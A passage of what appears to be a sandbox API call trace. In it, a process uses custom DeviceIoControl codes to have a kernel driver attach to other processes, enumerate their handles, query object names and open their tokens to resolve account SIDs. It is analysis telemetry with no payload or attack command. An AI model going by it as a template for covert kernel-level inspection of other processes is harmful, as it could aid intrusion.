lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0152.818] PsLookupProcessByProcessId (in: ProcessId=0x640, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.818] PsAcquireProcessExitSynchronization () returned 0x0 [0152.818] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880051635d0) [0152.818] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e7b3b0, HandleInformation=0x0) returned 0x0 [0152.818] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.818] PsReleaseProcessExitSynchronization () returned 0x2 [0152.818] ObfDereferenceObject (Object=0xfffffa8001f5eb30) returned 0x12 [0152.818] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f93044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f93044, ReturnLength=0xfffff88005163508) returned 0x0 [0152.819] ObfDereferenceObject (Object=0xfffffa8001e7b3b0) returned 0x1 [0152.819] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.819] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.819] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.819] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0152.819] PsLookupProcessByProcessId (in: ProcessId=0x640, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.819] PsAcquireProcessExitSynchronization () returned 0x0 [0152.819] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880051635d0) [0152.819] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020158b0, HandleInformation=0x0) returned 0x0 [0152.819] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.820] PsReleaseProcessExitSynchronization () returned 0x2 [0152.820] ObfDereferenceObject (Object=0xfffffa8001f5eb30) returned 0x12 [0152.820] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ffe044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ffe044, ReturnLength=0xfffff88005163508) returned 0x0 [0152.820] ObfDereferenceObject (Object=0xfffffa80020158b0) returned 0x1 [0152.820] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.820] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.820] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.820] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0152.820] PsLookupProcessByProcessId (in: ProcessId=0x640, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.821] PsAcquireProcessExitSynchronization () returned 0x0 [0152.821] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f5eb30, ApcState=0xfffff880051635d0) [0152.821] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0152.821] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.821] PsReleaseProcessExitSynchronization () returned 0x2 [0152.821] ObfDereferenceObject (Object=0xfffffa8001f5eb30) returned 0x12 [0152.821] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030a1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030a1044, ReturnLength=0xfffff88005163550) returned 0x0 [0152.821] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0152.821] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.821] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7dc) returned 0xc8 [0152.822] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0152.822] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001f60b30, HandleInformation=0x0) returned 0x0 [0152.822] ObOpenObjectByPointer (in: Object=0xfffffa8001f60b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0152.822] ObfDereferenceObject (Object=0xfffffa8001f60b30) returned 0x14 [0152.822] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8001eb4ec0 | out: TokenHandle=0xfffffa8001eb4ec0*=0xc4) returned 0x0 [0152.822] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0152.822] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.822] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0152.823] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0152.825] CloseHandle (hObject=0xc4) returned 1 [0152.825] CloseHandle (hObject=0xc8) returned 1 [0152.826] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.826] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0152.826] PsLookupProcessByProcessId (in: ProcessId=0x7dc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.826] PsAcquireProcessExitSynchronization () returned 0x0 [0152.826] KeStackAttachProcess (in: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880051635d0) [0152.826] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f5a650, HandleInformation=0x0) returned 0x0 [0152.826] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.826] PsReleaseProcessExitSynchronization () returned 0x2 [0152.826] ObfDereferenceObject (Object=0xfffffa8001f60b30) returned 0x12 [0152.826] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a0044, ReturnLength=0xfffff88005163508) returned 0x0 [0152.826] ObfDereferenceObject (Object=0xfffffa8001f5a650) returned 0x1 [0152.827] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.827] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.827] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.827] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x9e, lpOverlapped=0x0) returned 1 [0152.827] PsLookupProcessByProcessId (in: ProcessId=0x7dc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.827] PsAcquireProcessExitSynchronization () returned 0x0 [0152.827] KeStackAttachProcess (in: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880051635d0) [0152.827] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f62840, HandleInformation=0x0) returned 0x0 [0152.827] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.827] PsReleaseProcessExitSynchronization () returned 0x2 [0152.827] ObfDereferenceObject (Object=0xfffffa8001f60b30) returned 0x12 [0152.828] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800309f044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800309f044, ReturnLength=0xfffff88005163508) returned 0x0 [0152.828] ObfDereferenceObject (Object=0xfffffa8001f62840) returned 0x1 [0152.828] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.828] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.828] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.828] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0152.828] PsLookupProcessByProcessId (in: ProcessId=0x7dc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.828] PsAcquireProcessExitSynchronization () returned 0x0 [0152.828] KeStackAttachProcess (in: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880051635d0) [0152.828] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0152.828] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.829] PsReleaseProcessExitSynchronization () returned 0x2 [0152.829] ObfDereferenceObject (Object=0xfffffa8001f60b30) returned 0x12 [0152.829] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002ff8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ff8044, ReturnLength=0xfffff88005163550) returned 0x0 [0152.829] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0152.829] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.829] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3b4) returned 0xc8 [0152.829] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0152.829] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001edd630, HandleInformation=0x0) returned 0x0 [0152.829] ObOpenObjectByPointer (in: Object=0xfffffa8001edd630, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0152.830] ObfDereferenceObject (Object=0xfffffa8001edd630) returned 0x14 [0152.830] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8001eb4ec0 | out: TokenHandle=0xfffffa8001eb4ec0*=0xc4) returned 0x0 [0152.830] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0152.830] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.830] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0152.830] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0152.833] CloseHandle (hObject=0xc4) returned 1 [0152.833] CloseHandle (hObject=0xc8) returned 1 [0152.834] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.834] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0152.834] PsLookupProcessByProcessId (in: ProcessId=0x3b4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.834] PsAcquireProcessExitSynchronization () returned 0x0 [0152.834] KeStackAttachProcess (in: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880051635d0) [0152.834] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003792f20, HandleInformation=0x0) returned 0x0 [0152.834] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.834] PsReleaseProcessExitSynchronization () returned 0x2 [0152.834] ObfDereferenceObject (Object=0xfffffa8001edd630) returned 0x12 [0152.834] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ff7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ff7044, ReturnLength=0xfffff88005163508) returned 0x0 [0152.835] ObfDereferenceObject (Object=0xfffffa8003792f20) returned 0x1 [0152.835] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.835] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.835] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.835] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0152.835] PsLookupProcessByProcessId (in: ProcessId=0x3b4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.835] PsAcquireProcessExitSynchronization () returned 0x0 [0152.835] KeStackAttachProcess (in: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880051635d0) [0152.835] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e96dd0, HandleInformation=0x0) returned 0x0 [0152.835] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.836] PsReleaseProcessExitSynchronization () returned 0x2 [0152.836] ObfDereferenceObject (Object=0xfffffa8001edd630) returned 0x12 [0152.836] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ff6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ff6044, ReturnLength=0xfffff88005163508) returned 0x0 [0152.836] ObfDereferenceObject (Object=0xfffffa8001e96dd0) returned 0x1 [0152.836] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.836] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.836] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.836] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0152.836] PsLookupProcessByProcessId (in: ProcessId=0x3b4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.836] PsAcquireProcessExitSynchronization () returned 0x0 [0152.836] KeStackAttachProcess (in: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880051635d0) [0152.837] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0152.837] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.837] PsReleaseProcessExitSynchronization () returned 0x2 [0152.837] ObfDereferenceObject (Object=0xfffffa8001edd630) returned 0x12 [0152.837] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030a2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030a2044, ReturnLength=0xfffff88005163550) returned 0x0 [0152.837] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0152.837] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.837] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x704) returned 0xc8 [0152.837] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0152.838] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001ee8b30, HandleInformation=0x0) returned 0x0 [0152.838] ObOpenObjectByPointer (in: Object=0xfffffa8001ee8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0152.838] ObfDereferenceObject (Object=0xfffffa8001ee8b30) returned 0x14 [0152.838] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8001eb4ec0 | out: TokenHandle=0xfffffa8001eb4ec0*=0xc4) returned 0x0 [0152.838] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0152.838] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.838] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0152.839] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0152.841] CloseHandle (hObject=0xc4) returned 1 [0152.842] CloseHandle (hObject=0xc8) returned 1 [0152.842] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.842] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0152.842] PsLookupProcessByProcessId (in: ProcessId=0x704, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.842] PsAcquireProcessExitSynchronization () returned 0x0 [0152.842] KeStackAttachProcess (in: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880051635d0) [0152.842] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ee82d0, HandleInformation=0x0) returned 0x0 [0152.842] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.843] PsReleaseProcessExitSynchronization () returned 0x2 [0152.843] ObfDereferenceObject (Object=0xfffffa8001ee8b30) returned 0x12 [0152.843] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a3044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a3044, ReturnLength=0xfffff88005163508) returned 0x0 [0152.843] ObfDereferenceObject (Object=0xfffffa8001ee82d0) returned 0x1 [0152.843] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.843] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.843] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.843] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x64, lpOverlapped=0x0) returned 1 [0152.843] PsLookupProcessByProcessId (in: ProcessId=0x704, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.843] PsAcquireProcessExitSynchronization () returned 0x0 [0152.844] KeStackAttachProcess (in: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880051635d0) [0152.844] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ede150, HandleInformation=0x0) returned 0x0 [0152.844] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.844] PsReleaseProcessExitSynchronization () returned 0x2 [0152.844] ObfDereferenceObject (Object=0xfffffa8001ee8b30) returned 0x12 [0152.844] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a4044, ReturnLength=0xfffff88005163508) returned 0x0 [0152.844] ObfDereferenceObject (Object=0xfffffa8001ede150) returned 0x1 [0152.844] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.844] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.844] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.844] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0152.844] PsLookupProcessByProcessId (in: ProcessId=0x704, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.844] PsAcquireProcessExitSynchronization () returned 0x0 [0152.845] KeStackAttachProcess (in: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880051635d0) [0152.845] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0152.845] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.845] PsReleaseProcessExitSynchronization () returned 0x2 [0152.845] ObfDereferenceObject 